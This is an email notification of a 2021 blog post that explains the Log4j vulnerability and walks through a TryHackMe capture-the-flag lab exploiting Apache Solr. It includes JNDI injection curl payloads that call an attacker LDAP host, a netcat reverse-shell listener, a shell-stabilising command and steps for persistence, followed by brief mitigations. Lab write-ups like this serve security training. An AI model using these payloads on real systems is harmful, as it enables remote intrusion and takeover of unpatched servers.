[New post] Understanding Log4j

Aayush Goel posted: " What is Log4j? Log4j is a java package mostly a part of the Apache Logging utility used to capture logs. Everything you do on the internet becomes an event that gets captured in a form of a log. Even your inputs also get captured in logs. So, in th" Respond to this post by replying above this line New post on Information Security Blogs Understanding Log4j by Aayush Goel What is Log4j? Log4j is a java package mostly a part of the Apache Logging utility used to capture logs. Everything you do on the internet becomes an event that gets captured in a form of a log. Even your inputs also get captured in logs. So, in this case, the malicious input gets captured in the log which then results in the execution of the input resulting in remote code execution. That means the attacker is executing the commands using logs. Currently, the CVSS score of this vulenrability is 10 which makes it critical in severity. The CVE assigned to this vulnerability is CVE-2021-44228. Practical Demonstartion We will be using TryHackMe lab - Solar, exploiting log4j for practical purposes. Step 1 - Reconnaissance Using NMAP we found on port 8983 is using Apache Solr service which can be vulnerable to log4j. Step 2 - Discovery Let us try to find out the endpoint vulnerable to the exploit. The path is /admin/cores from the log file solr.logs Let's try to send a malicious request to the endpoint using below payload curl 'http://webserveraddress:8983/solr/admin/cores?foo=${jndi:ldap://attackerip:9999}' and turn on the listener to get a reverse shell by nc -nlvp 9999 and execute the payload We received a signal via some special character that means it's vulnerable. Step 3 - Exploitation Let's create an LDAP server locally using marshalsec executing the server and create an exploit in java with Netcat listener and HTTP server Now execute the HTTP, Netcat listeners, and LDAP service After that execute the exploit and again execute send the malicious request to the server curl 'http://serviceip:8983/solr/admin/cores?foo=${jndi:ldap://attackerip:1389/Exploit}' If everything goes well you will receive a reverse shell on the Netcat listener Let us stabilize the shell or try to get a persistent shell using python -c 'import pty; pty.spawn("/bin/bash")' and check for permissions From the following output, we infer that there are no restrictions So we will try to get the solr user access by changing the password solr user using root privileges and now we ssh as solr user That is how one can try to exploit this vulnerability. However, the exploitation is not limited as it may have many attack vectors. So better keep hustling. Mitigation Keep updating the service Block exploits by implementing firewall and egress rules This free site is ad-supported. Learn more ​ Aayush Goel | December 29, 2021 at 1:08 am | Tags: apache, cybersecurity, ethicalhacking, hacking, informationsecurity, log4j, penetrationtesting, security, solr, TryHackMe | Categories: API security, THM Write Up, Tools, Vulnerability Management, Web Application Security | URL: https://wp.me/pd4ZLF-aO Comment    See all comments    Like Unsubscribe to no longer receive posts from Information Security Blogs. Change your email settings at Manage Subscriptions. Trouble clicking? Copy and paste this URL into your browser: https://aayushforinfosec.wordpress.com/2021/12/29/understanding-log4j/ Thanks for flying with WordPress.com